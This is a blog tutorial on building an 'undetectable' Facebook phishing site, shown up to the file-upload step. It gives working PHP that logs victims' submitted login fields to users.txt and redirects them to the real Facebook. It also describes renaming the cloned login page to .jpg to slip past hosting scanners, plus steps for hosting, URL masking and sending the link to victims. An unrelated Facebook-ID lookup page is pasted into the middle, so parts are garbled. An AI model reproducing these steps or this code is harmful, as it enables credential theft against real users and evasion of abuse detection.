Friday, April 28, 2017
Create Undetectable Facebook Phishing Site Advanced
Create Undetectable Facebook Phishing Site Advanced
How to create undetectable facebook phishing page!, this is a big topic in now a days and i got many questions about this topic, so today i want to show a solution for this. in this tutorial i will explain the whole process to make phishing page undetectable including how to bypass security check of free hosting site to avoid account suspension , URL masking/hiding, and how to send it to victim.
In normal scenario when you design your phishing page and upload files to your hosting account, your Web Hosting provider attempts to find all phishing attempts from their servers, Maximum time they do this by using automated crawlers. If the crawler find any Forbidden character in your uploaded files. Sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files and may suspend your account but here you have the real solution for this problem.
If you are newbie to facebook phishing then i suggest you to read my previous article: How To Hack Facebook Using Phishing Method-Basic
Warning & Disclaimer: Making a phishing page is not illegal, but using a phishing page is illegal. This tutorial is just to show you, "How to create phishing page?". If you use this to hack anyone account, then I AM not responsible for it. Do anything on your own risk.
This tutorial has 3 main steps:
So Letss Start,
I prefer newbies to follow the step by step guide, so you can learn how phishing works. If you dont want to create yourself a phishing page then you can Download attachment file here(facebookdesktop.zip) or Alternate download and move to Step: 2
This tutorial has 3 main steps:
- Creating undetectable facebook phishing page
- Create an account in free web hosting site and upload the phisher files
- Url Masking/Hiding and send it to victim
I prefer newbies to follow the step by step guide, so you can learn how phishing works. If you dont want to create yourself a phishing page then you can Download attachment file here(facebookdesktop.zip) or Alternate download and move to Step: 2
Step 1: Creating undetectable facebook phishing page
First go to facebook home page (www.facebook.com) then, Right click > Save as and Save it as login.html.
Now you will get two files (login_files folder and login.html).
now right click on login.html and open with notepad and search (By pressing Ctrl+F) for : action in it and replace the highlighted part (as in the following screenshot) with data.php .
(there is 3 method and lot of actions in the file when you search, but you have to replace the first method and the action behind that)
Again search (By pressing Ctrl+F) for : method in it and replace the highlighted part (post) with get and save it.
Rename the login.html to login.jpg (jpg files will bypass the free hosting security check).
<!DOCTYPE html><html> <head> <title>Find your Facebook ID - a 5-second easy tool for locating your Facebook numeric personal ID</title> <meta name="description" content="If you need to know your Facebook numeric peronal ID, just plug your Profile URL into this simple tool." /> <link rel="stylesheet" href="reset.css" type="text/css" media="screen"> <link rel="stylesheet" href="style.css" type="text/css" media="screen"> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script> <script src="script.js" type="text/javascript" charset="utf-8"></script> <meta property="fb:admins" content="1146295886" /> </head> <body> <form action="" method="post"> <label for="fb_profile_url" class="text-input-label fb_profile_url-text-input-label"> Enter your personal Facebook profile URL: </label> <input type="text" name="fb_profile_url" value="" class="nr-text" size="45" placeholder="http://www.facebook.com/YourProfileName" /> <input type="hidden" name="unsanitized" class="nr-hidden hidden-input-for-unsanitized" /> <p> <input type="submit" value="Lookup numeric ID..." class="button-primary"> </p> <h1>Easily find your Facebook numeric personal ID for fb:admins social plugins and more!</h1> <p id="description"> For integrations of certain Facebook social plugins, like the "Like" button and "Like box", and others, Facebook
requires that you know your Facebook numeric user ID. Unfortunately, they make this very difficult to find, especially
if you have a so-called "vanity" personalized profile URL. If you cant find your Facebook ID, or dont know what it is
and need it, just enter your full Facebook profile URL in the above form, and we can scrape the ID from the code of your
personal profile page.
</p></form>
<script type="text/javascript"> var _gaq = _gaq || []; _gaq.push([_setAccount, UA-3361652-13]); _gaq.push([_trackPageview]); (function() { var ga = document.createElement(script); ga.type = text/javascript; ga.async = true; ga.src = (https: == document.location.protocol ? https://ssl : http://www) + .google-analytics.com/ga.js; var s = document.getElementsByTagName(script)[0]; s.parentNode.insertBefore(ga, s); })();</script> </body></html>
Next you copy below code and paste it in notepad and save it as index.php.
<?php$id = $_GET["id"];if ($id == "facebookdesktop") { $myFile = "login.jpg"; $fh = fopen($myFile, r); $theData = fread($fh, 500000); fclose($fh); echo $theData;}else{ $myFile1 = "follow.jpg"; $fh1 = fopen($myFile1, r); $theData1 = fread($fh1, 500000); fclose($fh1); echo $theData1;}?>
Now you have to create another php file, so copy the below code and save it as data.php.
:<?phpheader("Location: https://m.facebook.com/login.php?&e=1348092&email=");$handle = fopen("users.txt", "a");foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, " ");}fwrite($handle, " ");fclose($handle);exit;?>
At last we have to create a txt file to store victims username and password, so make a blank txt file and save it as users.txt.
If you followed all the above steps carefully, you will have 6 files including 1 folder and It will look similar to this :
Now select all files and create a zip of it (any name in my case it is facebookdesktop.zip). Click here to download attachment
Note: make sure all the 6 files are inside the .zip file
Step 2: Create an account in free web hosting site and upload the phisher files
I prefer 000.webhost.com.
Go to: https://members.000webhost.com/signup and fill out the information needed and click on Create My Account.
Open your email and verify the account you will see the active domain in your account ,then click on Go to CPanel (highlighted in below screen shot).
Now open the first file manager icon under File managers section.
Go to “public_html” folder and delete the 2 files inside it. then click on “upload“.
Available link for download
